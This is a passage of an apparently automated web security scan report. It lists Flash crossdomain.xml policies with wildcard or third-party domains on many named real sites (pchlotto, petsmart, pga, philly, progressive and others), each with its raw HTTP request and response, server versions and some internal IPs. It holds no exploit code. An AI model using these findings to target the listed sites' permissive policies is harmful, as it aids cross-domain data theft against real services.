<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="
...[SNIP]...
<allow-access-from domain="*.pch.com"/>
   <allow-access-from domain="a1708.g.akamai.net"/>
   <allow-access-from domain="*.aghtd.com"/>
...[SNIP]...

7.384. http://www.pchlotto.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pchlotto.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pchlotto.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 04 Nov 2010 21:30:54 GMT
ETag: "ab4b74-1d7-49440df6b1f80"
Accept-Ranges: bytes
Content-Length: 471
Content-Type: text/xml
Date: Sat, 02 Apr 2011 14:05:18 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-d
omain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.pch.com"/>
<allow-access-from domain="*.*.pch.com"/>
<allow-access-from domain="a1708.g.akamai.net"/>
<allow-access-from domain="*.aghtd.com"/>
<allow-access-from domain="164.109.104.3" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="www.continuumjournals.com"/>
...[SNIP]...

7.385. http://www.petfinder.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.petfinder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.petfinder.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.4 (Unix) mod_apreq2-20051231/2.6.0 mod_perl/2.0.3 Perl/v5.8.5
Last-Modified: Wed, 28 Jul 2010 18:49:30 GMT
Accept-Ranges: bytes
Content-Length: 382
Content-Type: application/xml
Expires: Sat, 02 Apr 2011 13:38:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:38:20 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.discovery.com" />
   <allow-access-from domain="www.bakerandhill.com" />
   <allow-access-from domain="www.bakerandhillapps.com" />
   <allow-access-from domain="*.draftfcb.info" />
   <allow-access-from domain="*.theshelterpetproject.org" />
   <allow-access-from domain="*.petfinder.com" />
...[SNIP]...

7.386. http://www.petside.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.petside.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.petside.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 16 Mar 2009 14:55:40 GMT
ETag: "b61105-c4-4653da4d9f300"
Content-Type: application/xml
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 13:44:41 GMT
Date: Sat, 02 Apr 2011 13:43:41 GMT
Content-Length: 196
Connection: close

<?xml version="1.0"?>
<!-- crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="*.nbcuni.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
</cross-domain-policy>

7.387. http://www.petsmart.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.petsmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.petsmart.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:32 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 08 May 2008 01:49:36 GMT
ETag: "53c78d-30d-44cae4b2b6c00"
Accept-Ranges: bytes
Content-Length: 781
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:50:32 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.petsmart.com" secu
...[SNIP]...
<allow-access-from domain="*.petsmart.com" secure="true" />
...[SNIP]...
<allow-access-from domain="pet.imageg.net" />
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="172.20.1.172" />
<allow-access-from domain="172.21.1.172" />
<allow-access-from domain="206.16.220.172" />
<allow-access-from domain="63.240.110.172" />
<allow-access-from domain="preview.gsipartners.com" secure="true" />
...[SNIP]...

7.388. http://www.pga.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pga.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pga.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:44 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 15:23:54 GMT
Accept-Ranges: bytes
Content-Length: 2034
Content-Type: application/xml
Cache-Control: max-age=120
Expires: Sat, 02 Apr 2011 13:53:44 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.pga.
...[SNIP]...
<allow-access-from domain="pga.com"/>
<allow-access-from domain="i.pga.com"/>
<allow-access-from domain="*.pga.com"/>
<allow-access-from domain="beta.pga.com"/>
<allow-access-from domain="ads.pga.com"/>
<allow-access-from domain="www.pgatour.com"/>
<allow-access-from domain="pgatour.com"/>
<allow-access-from domain="i.pgatour.com"/>
<allow-access-from domain="tourfeeds.pga.com"/>
<allow-access-from domain="*.pgatour.com"/>
<allow-access-from domain="*.rydercup.com"/>
<allow-access-from domain="*.cnn.com"/>
<allow-access-from domain="*.turner.com"/>
<allow-access-from domain="*.cnn.net"/>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net"/>
<allow-access-from domain="m.2mdn.net"/>

<allow-access-from domain="m2.2mdn.net"/>
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="*.i-traffic.com"/>
<allow-access-from domain="ar.atwola.com"/>
<allow-access-from domain="*.itraffic.com"/>
<allow-access-from domain="*.agency.com"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.time.com"/>
<allow-access-from domain="*.VillageVoice.com"/>

<allow-access-from domain="*.nymag.com"/>
<allow-access-from domain="*. salon.com"/>
<allow-access-from domain="*.secondthought.com"/>
<allow-access-from domain="*.clk4.com"/>
<allow-access-from domain="servedby.advertising.com"/>
<allow-access-from domain="bannerfarm.advertising.com"/>
<allow-access-from domain="*.advertising.com"/>
<allow-access-from domain="*.crewintegrated.com"/>
<allow-access-from domain="gfx.klipmart.com"/>
<allow-access-from domain="*.klipmart.com"/>
...[SNIP]...

7.389. http://www.pgatour.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pgatour.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pgatour.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:41 GMT
Server: Apache
Last-Modified: Fri, 06 Aug 2010 20:57:01 GMT
Accept-Ranges: bytes
Content-Length: 1774
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="pga-livescoring.chester.contentproject.com"/>
   <allow-access-from domain="*.pgatour.com"/>
   <allow-access-from domain="*.pga.com"/>
   <allow-access-from domain="i.cdn.turner.com"/>
   <allow-access-from domain="*.cnn.com"/>
   <allow-access-from domain="*.turner.com"/>
   <allow-access-from domain="*.cnn.net"/>
   <allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net"/>
   <allow-access-from domain="m.2mdn.net"/>
   <allow-access-from domain="m2.2mdn.net"/>
   <allow-access-from domain="*.2mdn.net"/>
   <allow-access-from domain="*.i-traffic.com"/>
   <allow-access-from domain="ar.atwola.com"/>
   <allow-access-from domain="*.itraffic.com"/>
   <allow-access-from domain="*.agency.com"/>
   <allow-access-from domain="*.aol.com"/>
   <allow-access-from domain="*.time.com"/>
   <allow-access-from domain="*.VillageVoice.com"/>
   <allow-access-from domain="*.nymag.com"/>
   <allow-access-from domain="*. salon.com"/>
   <allow-access-from domain="*.secondthought.com"/>
   <allow-access-from domain="*.clk4.com"/>
   <allow-access-from domain="servedby.advertising.com"/>
   <allow-access-from domain="bannerfarm.advertising.com"/>
   <allow-access-from domain="*.advertising.com"/>
   <allow-access-from domain="*.crewintegrated.com"/>
   <allow-access-from domain="gfx.klipmart.com"/>
   <allow-access-from domain="*.klipmart.com"/>
   <allow-access-from domain="*.viewpoint.com"/>
   <allow-access-from domain="*.unicast.com"/>
   <allow-access-from domain="*.go123ov.com" secure="false" />
...[SNIP]...

7.390. http://www.philly.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.philly.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.philly.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=3600
Content-Type: text/xml;charset=utf-8
Date: Sat, 02 Apr 2011 13:36:15 GMT
Expires: Sat, 02 Apr 2011 14:36:15 GMT
Last-Modified: Mon, 28 Mar 2011 08:09:32 GMT
Server: ECS (dca/532A)
Via: 1.0 dv-c1-r2-u7-b4:3128 (squid)
X-Cache: HIT
X-Server-Name: dv-c1-r3-u14-b14
Content-Length: 4529
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="www.philly.com" />

<allow-access-from domain="dev.www.philly.com" />

<allow-access-from domain="stage.www.philly.com" />

<allow-access-from domain="media.philly.com" />

<allow-access-from domain="cms.clickability.com" />
...[SNIP]...
<allow-access-from domain="inquirer.philly.com" />

<allow-access-from domain="www.argentumwebs.com" />

<allow-access-from domain="argentumwebs.com" />

<allow-access-from domain="www.biemedia.com" />

<allow-access-from domain="biemedia.com" />

<allow-access-from domain="support.biemedia.com" />

<allow-access-from domain="inquirer.philly.com" />

<allow-access-from domain="go.philly.com" />

<allow-access-from domain="aps1.philly.com" />

<allow-access-from domain="*.brightcove.com" />

<allow-access-from domain="rss.teamfanshop.com" />

<allow-access-from domain="feeds.teamfanshop.com" />

<allow-access-from domain="images.footballfanatics.com" />

<allow-access-from domain="concepts.philly.com" />

   <allow-access-from domain="http://doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="http://ad.doubleclick.net"/>
   <allow-access-from domain="http://ad.uk.doubleclick.net"/>
   <allow-access-from domain="http://ad.ie.doubleclick.net"/>
   <allow-access-from domain="http://ad.fr.doubleclick.net"/>
   <allow-access-from domain="http://ad.es.doubleclick.net"/>
   <allow-access-from domain="http://ad.it.doubleclick.net"/>
   <allow-access-from domain="http://ad.de.doubleclick.net"/>
   <allow-access-from domain="http://ad.nl.doubleclick.net"/>
   <allow-access-from domain="http://ad.se.doubleclick.net"/>
   <allow-access-from domain="http://ad.au.doubleclick.net"/>
   <allow-access-from domain="http://ad.jp.doubleclick.net"/>
   <allow-access-from domain="http://ad.cn.doubleclick.net"/>
   <allow-access-from domain="http://ad.tw.doubleclick.net"/>
   <allow-access-from domain="http://ad.hk.doubleclick.net"/>
   <allow-access-from domain="http://creatives.doubleclick.net"/>
   <allow-access-from domain="http://dfa.doubleclick.com"/>
   <allow-access-from domain="http://dfa.doubleclick.net"/>
   <allow-access-from domain="http://dfp.doubleclick.com"/>
   <allow-access-from domain="http://dfp.doubleclick.net"/>
   <allow-access-from domain="http://motifcdn.doubleclick.net"/>
   <allow-access-from domain="http://motifcdn2.doubleclick.net"/>
   <allow-access-from domain="http://m.doubleclick.net"/>
   <allow-access-from domain="http://m.2mdn.net"/>
   <allow-access-from domain="http://m.uk.2mdn.net"/>
   <allow-access-from domain="http://m.fr.2mdn.net"/>
   <allow-access-from domain="http://m.de.2mdn.net"/>
   <allow-access-from domain="http://m.se.2mdn.net"/>
   <allow-access-from domain="http://m.au.2mdn.net"/>
   <allow-access-from domain="http://m.jp.2mdn.net"/>
   <allow-access-from domain="http://m.cn.2mdn.net"/>
   <allow-access-from domain="http://m.tw.2mdn.net"/>
   <allow-access-from domain="http://m.hk.2mdn.net"/>
   <allow-access-from domain="http://m1.doubleclick.net"/>
   <allow-access-from domain="http://m1.2mdn.net"/>
   <allow-access-from domain="http://m1.jp.2mdn.net"/>
   <allow-access-from domain="http://m2.doubleclick.net"/>
   <allow-access-from domain="http://m2.2mdn.net"/>
   <allow-access-from domain="http://m3.doubleclick.net"/>
   <allow-access-from domain="http://m3.2mdn.net"/>
   <allow-access-from domain="http://demo.doubleclick.com"/>
   <allow-access-from domain="http://demo.doubleclick.net"/>
   <allow-access-from domain="http://sandbox.dartmotif.com"/>
   <allow-access-from domain="http://2mdn.aolcdn.com"/>
   <allow-access-from domain="http://static.2mdn.net"/>
   <allow-access-from domain="http://s0.2mdn.net"/>
   <allow-access-from domain="http://s1.2mdn.net"/>
   
<allow-access-from domain="www.phrequency.com" />

<allow-access-from domain="dev.www.phrequency.com" />

<allow-access-from domain="stage.www.phrequency.com" />

<allow-access-from domain="media.phrequency.com" />

<allow-access-from domain="www.citypaper.net" />

<allow-access-from domain="dev.www.citypaper.net" />

<allow-access-from domain="stage.www.citypaper.net" />

<allow-access-from domain="media.citypaper.net" />

<allow-access-from domain="*.issuu.com" />

<allow-access-from domain="dev.kb.philly.com" />

<allow-access-from domain="stage.kb.philly.com" />
...[SNIP]...

7.391. http://www.picnik.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.picnik.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.picnik.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:30:34 GMT
Server: Apache/2.2.4
Last-Modified: Tue, 01 Feb 2011 19:39:18 GMT
ETag: "304-b02ea580"
Accept-Ranges: bytes
Content-Length: 772
Cache-Control: max-age=7200
Expires: Sat, 02 Apr 2011 15:30:34 GMT
P3P: CP="NOI DSP COR CUR ADM DEV OUR BUS UNI"
X-Picnik-Info: h=w110.sea.picnik.com t=1301751034414528 D=165
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!--http://www.picnik.com/crossdomain.xml-->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.picnik.com" secure="false" />
...[SNIP]...
<allow-access-from domain="l.yimg.com" secure="false" />
...[SNIP]...
<allow-access-from domain="staging.flickr.com" secure="false" />
...[SNIP]...
<allow-access-from domain="backstage.flickr.com" secure="false" />
...[SNIP]...

7.392. http://www.playsushi.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.playsushi.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.playsushi.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:50 GMT
Server: Apache
Last-Modified: Fri, 10 Jul 2009 19:42:18 GMT
ETag: "1d98c56-124-46e5f2b861a80"
Accept-Ranges: bytes
Content-Length: 292
Cache-Control: max-age=18000
Expires: Sat, 02 Apr 2011 18:34:50 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*.plscdn.com" secure="false"/>
...[SNIP]...

7.393. http://www.plentyoffish.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.plentyoffish.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.plentyoffish.com

Response

HTTP/1.1 200 OK
Content-Length: 225
Content-Type: text/xml
Last-Modified: Fri, 11 Sep 2009 18:23:24 GMT
Accept-Ranges: bytes
ETag: "9cb61ff3c33ca1:946"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:27:00 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.plentyoffish.com" />
...[SNIP]...

7.394. http://www.pogo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pogo.com

Response

HTTP/1.1 200 OK
Age: 89720
Date: Fri, 01 Apr 2011 12:39:58 GMT
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"562-1272402607000"
Last-Modified: Tue, 27 Apr 2010 21:10:07 GMT
Content-Type: text/xml
Content-Length: 562
Server: Apache-Coyote/1.1

<?xml version="1.0" encoding="ISO-8859-1"?>

<!--
This file is to allow .swfs being served from the ea and double click domains listed below to access XML data (or other services) from the domain th
...[SNIP]...
<allow-access-from domain="*.pogo.com"/>
   <allow-access-from domain="*.pogobeta.com"/>
   <allow-access-from domain="*.ea.com"/>
   <allow-access-from domain="*.easports.com"/>
   <allow-access-from domain="*.pogospike.com"/>
...[SNIP]...

7.395. http://www.politico.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.politico.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.politico.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.6 (Fedora)
Last-Modified: Wed, 09 Mar 2011 16:46:27 GMT
ETag: "ffc69-2ce-784f3ec0"
Content-Type: text/xml
Cache-Control: max-age=10
Expires: Sat, 02 Apr 2011 13:27:05 GMT
Date: Sat, 02 Apr 2011 13:26:55 GMT
Content-Length: 718
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.politico.com" />
   <allow-access-from domain="*brightcove" />
   <allow-access-from domain="*.brightcove" />
   <allow-access-from domain="*.brightcove.com" />
   <allow-access-from domain="*.politiconetwork.com" />
   <allow-access-from domain="brightcove.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cache.btrll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="admin.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.google-analytics.com"/>
   <allow-access-from domain="*.omniture.com"/>
...[SNIP]...

7.396. http://www.politicsdaily.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.politicsdaily.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.politicsdaily.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:07:08 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 318
Keep-Alive: timeout=5, max=999930
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.unicast.com" />
...[SNIP]...

7.397. http://www.poptropica.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.poptropica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.poptropica.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Cache-Control: max-age=3600
Date: Thu, 09 Dec 2010 19:11:15 GMT
Server: TUX/2.0 (Linux)
Content-Length: 363
Accept-Ranges: bytes
Last-Modified: Thu, 18 Nov 2010 18:53:18 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.poptropica.com" secure="false" /><allow-access-from domain="*.familyeducation.com" secure="false" /><allow-access-from domain="*.http.akamai-trials.com" secure="false" />
...[SNIP]...

7.398. http://www.potterybarn.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.potterybarn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.potterybarn.com

Response

HTTP/1.0 200 OK
Content-Length: 378
Content-Type: text/xml;charset=UTF-8
Set-Cookie: PBDPWWW-EC=R4233321340; expires=Sun, 03-Apr-2011 14:02:11 GMT; domain=.potterybarn.com; path=/
Set-Cookie: WSPFY=179ed7406c5f00002a2b974d260501009b500000; expires=Mon, 1-Jan-2024 00:00:01 GMT; domain=.potterybarn.com; path=/
Set-Cookie: PBPE_SID=pbec2KSSSMJH0S2OTJ2WGTOLLSSRTRQK201104020656; domain=.potterybarn.com; path=/
Set-Cookie: WSIDC=EAST; domain=.potterybarn.com; path=/
Content-Language: en-US
Expires: Sat, 02 Apr 2011 13:56:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:56:58 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies
...[SNIP]...
<allow-access-from domain="*.potterybarn.com" secure="false"/>
...[SNIP]...

7.399. http://www.progressive.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.progressive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.progressive.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 13:45:03 GMT
Content-Type: text/xml
Content-Location: http://www.progressive.com/crossdomain.xml
Last-Modified: Mon, 22 Oct 2007 11:22:08 GMT
Accept-Ranges: bytes
ETag: "0b01fc89d14c81:ca5"
Server: Microsoft-IIS/6.0
P3P: CP = "CUR ADM DEV TAI PSA PSD IVAo IVDo CONo OUR OTRo IND DSP COR CAO PHY ONL UNI PUR COM FIN NAV INT DEM CNT STA GOV OTC" policyref="http://www.progressive.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
Set-Cookie: SITESERVER=ID=2dc241d661cb4382b8af9de86e7835f0; path=/; domain=.progressive.com; expires=Sun, 31 Dec 2034 00:00:00 GMT
Set-Cookie: TLTSID=69BA113F409A71A1A698969E82A8BB47; Domain=.progressive.com; path=/
Set-Cookie: TLTHID=69BA113F409A71A1A698969E82A8BB47; Domain=.progressive.com; path=/
Set-Cookie: TLTUID=69BA113F409A71A1A698969E82A8BB47; Domain=.progressive.com; path=/; expires=Sat, 02-04-2021 13:45:03 GMT
Content-Length: 617

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="localhost" />
<allow-access-from domain="*.progressive.local" />
<allow-access-from domain="*.progressivedirect.local" />
<allow-access-from domain="*.progressive.com" />
<allow-access-from domain="*.progressivedirect.com" />
<allow-access-from domain="*.progressiveseguros.local" />
<allow-access-from domain="*.progressiveseguros.com" />
<allow-access-from domain="*.speedera.net" />
...[SNIP]...

7.400. http://www.psu.edu/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.psu.edu
